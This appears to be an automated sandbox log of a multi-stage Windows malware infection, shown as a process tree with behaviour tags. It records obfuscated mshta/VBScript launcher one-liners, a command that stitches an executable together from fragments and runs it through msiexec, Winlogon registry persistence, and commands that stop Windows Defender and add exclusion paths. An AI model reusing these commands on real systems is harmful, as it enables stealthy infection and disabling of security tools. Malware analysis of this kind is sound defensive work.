C:\Users\Admin\Pictures\Adobe Films\KZWrNrUfQpue1da5aQf94oLP.exe"C:\Users\Admin\Pictures\Adobe Films\KZWrNrUfQpue1da5aQf94oLP.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\KZWrNrUfQpue1da5aQf94oLP.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\KZWrNrUfQpue1da5aQf94oLP.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\KZWrNrUfQpue1da5aQf94oLP.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\KZWrNrUfQpue1da5aQf94oLP.exe" ) do taskkill -im "%~NxK" -F5⤵
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F8⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )7⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"9⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "9⤵
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY9⤵
- Loads dropped DLL
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "KZWrNrUfQpue1da5aQf94oLP.exe" -F6⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\e10Jb2xCvxeAn7bjgKZPicoU.exe"C:\Users\Admin\Pictures\Adobe Films\e10Jb2xCvxeAn7bjgKZPicoU.exe"3⤵
-
C:\Users\Admin\Pictures\Adobe Films\e10Jb2xCvxeAn7bjgKZPicoU.exe"C:\Users\Admin\Pictures\Adobe Films\e10Jb2xCvxeAn7bjgKZPicoU.exe"4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wbSFW6bY1yGkPijcb5mBLctC.exe"C:\Users\Admin\Pictures\Adobe Films\wbSFW6bY1yGkPijcb5mBLctC.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=14⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x1f0,0x220,0x7fffe9d5dec0,0x7fffe9d5ded0,0x7fffe9d5dee06⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7d2e89e70,0x7ff7d2e89e80,0x7ff7d2e89e907⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1620,2201471579890345333,10540745210558617081,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5404_201314625" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1636 /prefetch:26⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,2201471579890345333,10540745210558617081,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5404_201314625" --mojo-platform-channel-handle=1392 /prefetch:86⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\Dc2cGIo8H66p8bqWXY8d5sy2.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\8F9A.exeC:\Users\Admin\AppData\Local\Temp\8F9A.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\8F9A.exeC:\Users\Admin\AppData\Local\Temp\8F9A.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Users\Admin\AppData\Local\Temp\354.exeC:\Users\Admin\AppData\Local\Temp\354.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 2723⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\7856.exeC:\Users\Admin\AppData\Local\Temp\7856.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\B34C.exeC:\Users\Admin\AppData\Local\Temp\B34C.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7832 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\5E05.exeC:\Users\Admin\AppData\Local\Temp\5E05.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5E05.exeC:\Users\Admin\AppData\Local\Temp\5E05.exe3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\B2E.exeC:\Users\Admin\AppData\Local\Temp\B2E.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 2763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\F4C4.exeC:\Users\Admin\AppData\Local\Temp\F4C4.exe2⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7552 -s 2843⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\1165.exeC:\Users\Admin\AppData\Local\Temp\1165.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.youtube.com3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\4026.exeC:\Users\Admin\AppData\Local\Temp\4026.exe2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ipconfig /release3⤵
-
C:\Windows\SysWOW64\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /release4⤵
- Gathers network information
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping twitter.com3⤵
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" twitter.com4⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\51DB.exeC:\Users\Admin\AppData\Local\Temp\51DB.exe2⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Local\chromedrlver.exe,"4⤵
- Modifies WinLogon for persistence
-
-
-
C:\Users\Admin\AppData\Local\chromedrlver.exe"C:\Users\Admin\AppData\Local\chromedrlver.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\80AC.exeC:\Users\Admin\AppData\Local\Temp\80AC.exe2⤵
- Drops startup file
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\93e270dc-5ef7-4411-bdec-7d96c9d9bc69\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\93e270dc-5ef7-4411-bdec-7d96c9d9bc69\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\93e270dc-5ef7-4411-bdec-7d96c9d9bc69\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\93e270dc-5ef7-4411-bdec-7d96c9d9bc69\test.bat"4⤵
-
C:\Windows\system32\sc.exesc stop windefend5⤵
-
-
C:\Windows\system32\sc.exesc config windefend start= disabled5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c04ce0f1-1a6b-4e2c-a8f9-8a9448cac841\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\c04ce0f1-1a6b-4e2c-a8f9-8a9448cac841\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c04ce0f1-1a6b-4e2c-a8f9-8a9448cac841\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\c04ce0f1-1a6b-4e2c-a8f9-8a9448cac841\test.bat"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\80AC.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\80AC.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\80AC.exe" -Force3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\80AC.exe" -Force3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe"3⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
-
C:\Users\Admin\AppData\Local\Temp\7e0f59d1-7edb-4d07-a1a0-06e3d8ec8015\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\7e0f59d1-7edb-4d07-a1a0-06e3d8ec8015\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\7e0f59d1-7edb-4d07-a1a0-06e3d8ec8015\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7e0f59d1-7edb-4d07-a1a0-06e3d8ec8015\test.bat"5⤵
-
C:\Windows\system32\sc.exesc stop windefend6⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8742cee3-0007-4a4f-af99-03b6bbaa1f1f\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\8742cee3-0007-4a4f-af99-03b6bbaa1f1f\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\8742cee3-0007-4a4f-af99-03b6bbaa1f1f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8742cee3-0007-4a4f-af99-03b6bbaa1f1f\test.bat"5⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptwriters.exe" -Force4⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\80AC.exe" -Force3⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\veejays\svchost.exe" -Force3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"3⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\B025.exeC:\Users\Admin\AppData\Local\Temp\B025.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 4683⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7252 -s 4763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\AppData\Local\Temp\F339.exeC:\Users\Admin\AppData\Local\Temp\F339.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 2763⤵
- Program crash
-
-
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 17993e8b3687ae87e4c0225af4524e3e ntmwIsluzUm1basLYVrQvg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2644 -ip 26441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3480 -ip 34801⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4616 -ip 46161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 2768 -ip 27681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4620 -ip 46201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4024 -ip 40241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 744 -p 2696 -ip 26961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5008 -ip 50081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1432 -ip 14321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 1592 -ip 15921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4820 -ip 48201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-FON2R.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-FON2R.tmp\setup.tmp" /SL5="$40328,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart3⤵
-
C:\955e3dc2d5855645f220d06c51c4\Setup.exeC:\955e3dc2d5855645f220d06c51c4\\Setup.exe /q /norestart /x86 /x64 /web4⤵
- Loads dropped DLL
- Checks processor information in registry
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\is-L3OKN.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-L3OKN.tmp\postback.exe" ss13⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5028 -ip 50281⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5884 -ip 58841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3620 -ip 36201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 6616 -ip 66161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 4080 -ip 40801⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1896 -ip 18961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4208 -ip 42081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5952 -ip 59521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6636 -ip 66361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7832 -ip 78321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5208 -ip 52081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 17993e8b3687ae87e4c0225af4524e3e ntmwIsluzUm1basLYVrQvg.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5440 -ip 54401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2228 -ip 22281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 7552 -ip 75521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
